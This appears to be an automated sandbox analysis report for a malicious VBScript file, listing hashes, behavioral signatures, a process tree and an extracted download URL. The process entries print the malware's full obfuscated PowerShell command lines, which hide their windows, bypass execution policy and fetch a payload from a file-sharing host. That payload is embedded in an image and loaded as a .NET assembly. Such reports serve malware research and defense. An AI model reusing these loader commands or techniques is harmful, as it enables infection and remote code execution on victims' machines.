Analysis
  max time kernel:  119s
  max time network: 123s
  platform:         windows7_x64
  resource:         win7-20240903-en
  resource tags:    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  submitted:        12-11-2024 03:08
Static task: static1

Behavioral task: behavioral1
  Sample:   f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348.vbs
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample:   f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348.vbs
  Resource: win10v2004-20241007-en
General
  Target: f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348.vbs
  Size:   11KB
  MD5:    f5678ceb6c0d259337b4dab43f009e97
  SHA1:   71bc74501d1b126adb0bed8d7e4c3e182cd5bbbe
  SHA256: f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348
  SHA512: 463b6cca15009a574a454637f3d5555c3ebde0117f65c12d0803e9ca3dac0e534b157ef473deaf703b60db396bde0a384b9471f4fccaed33995217353619a739
  SSDEEP: 192:mXThtJfTvuOg25CfSkYiGh6yR4W8L8tnQ2+mi3F8w/RHXS:8FOGqF/JHXS
Malware Config
Extracted
  https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures

Blocklisted process makes network request (4 IoCs)
  flow  pid   Process
  3     1892  WScript.exe
  4     1892  WScript.exe
  8     2772  powershell.exe
  9     2772  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Run Powershell and hide display window.
  pid   Process
  2772  powershell.exe
  612   powershell.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Script User-Agent (2 IoCs)
  Uses user-agent string associated with script host/environment.
  description             flow  ioc
  HTTP User-Agent header  3     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  4     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  612   powershell.exe
  2772  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  612   powershell.exe
  Token: SeDebugPrivilege  2772  powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
  description                       pid   Process         procid_target
  PID 1792 wrote to memory of 1892  1792  WScript.exe     31   (reported 3 times)
  PID 1892 wrote to memory of 612   1892  WScript.exe     32   (reported 3 times)
  PID 612 wrote to memory of 2772   612   powershell.exe  34   (reported 3 times)
Processes

1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4f50825743ac2b448f3254ff8ac01323ff16f9ed2287d0fe7614cf0b7a12348.vbs"
   PID: 1792
   - Suspicious use of WriteProcessMemory

2. C:\Windows\System32\WScript.exe (child of 1)
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\XqrJnUsDhYijtro.vbs"
   PID: 1892
   - Blocklisted process makes network request
   - Suspicious use of WriteProcessMemory

3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of 2)
   Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
   PID: 612
   - Command and Scripting Interpreter: PowerShell
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory

4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of 3), command line as recorded by the sandbox:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OK6imageUrl = 9Schttps://1017.filemail.com/api/file/get?f'+'ilekey=2Aa_bWo'+'9Reu45'+'t'+'7BU1kVgsd9pT9pgSSlvStGrnTI'+'CfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f 9Sc;OK6webC'+'lient = New'+'-Object System.Net.WebClient;OK6imageBytes = OK6webC'+'lient.Downlo'+'adData(OK6imageUrl);OK6imageText = [System.'+'Text.Encoding]::UTF8.GetString(OK6imag'+'eBytes);OK6sta'+'rtFlag = 9Sc<<BASE64_START>>9Sc;OK6endFlag = 9Sc<<BASE64_END>>9Sc;OK6startIndex = OK6imageText.IndexOf(OK6startFl'+'ag)'+';OK6endIndex = OK6ima'+'geText.In'+'dexOf(OK6endFlag);OK6sta'+'rtIndex -ge 0 -and OK6endIndex -gt OK6startIndex;OK6startIndex +'+'= OK6startFlag.Length;OK6base64Length = OK6endIndex - OK6startIndex;OK6base64Command = OK6imageText.Substring('+'OK6st'+'artIndex, OK6base64Length);OK6base64Reversed = -join (OK6base64Command.ToCharArray() trb ForEach-Object { OK6_ })[-1..-('+'OK6base64Co'+'mmand.Length)];OK6comman'+'dBytes = [System.Convert]::'+'FromBase64Str'+'i'+'ng(OK6bas'+'e64'+'Rever'+'sed);OK6loadedAssembly = [System.Reflection.Assembly'+']::Load(OK6commandBytes);OK6vaiMethod = [dnlib.IO.Home].GetMethod(9S'+'cVAI9Sc);OK6vaiMethod.Invoke(OK6null,'+' @(9Sct'+'xt.LSSWS/klo/ue.hsupwsrellor.sup//:ptth9Sc, 9Scdesativado9Sc, 9Scdesativado9Sc, 9Sc'+'desativado9Sc, 9S'+'cdesativa'+'d'+'o9Sc, 9Sc19Sc, 9ScOneDriveSetup9Sc, 9Scdesativado9Sc, 9Scdesativa'+'do9Sc,9Scdesativado9Sc,9Scdesativado9Sc,9Scd'+'esativado9Sc,9Sc19Sc,9Scdesa'+'tivado9Sc));') -replACe([CHar]116+[CHar]114+[CHar]98),[CHar]124-creplaCE 'OK6',[CHar]36 -replACe '9Sc',[CHar]39) | & ((Gv '*MdR*').NamE[3,11,2]-joiN'')"4⤵
   PID: 2772
   - Blocklisted process makes network request
   - Command and Scripting Interpreter: PowerShell
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken

Network
MITRE ATT&CK Enterprise v15
Downloads

  Filesize: 1KB
  MD5:      03e4e4d0259b3af7b37e2802812d9128
  SHA1:     fcef4018ec7206fb296b79e8035bb02457e39872
  SHA256:   26524695f59b3f155be3c94504537f36c5de23bc2226e5819b7919023dd5c183
  SHA512:   dbdaa2707f6e19442a7d55f119487b418f17a040462b11fc88653e130709c1127e2d0d1923dde3258546ff07b18c1d3c5cdbc2a7ff40f342d3689a618159e1a6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5:      0b9439986ee468c1b245ae3b109fc8f8
  SHA1:     99e47c9f6bbfa40e0a6a928ca7288a078b0871a4
  SHA256:   33acb07b5b81eb2d21ed2f0b5b261bc42dd2bf3fd8fe5976fd4ee9a9420489b9
  SHA512:   20ffb5a73266da8a49e4de08034659e37ef8eed6c7d648476564e1291c1be9a5ddc81774227e78515d3bf5ce46cc648fbbb0372496dae365ad4595c29b583892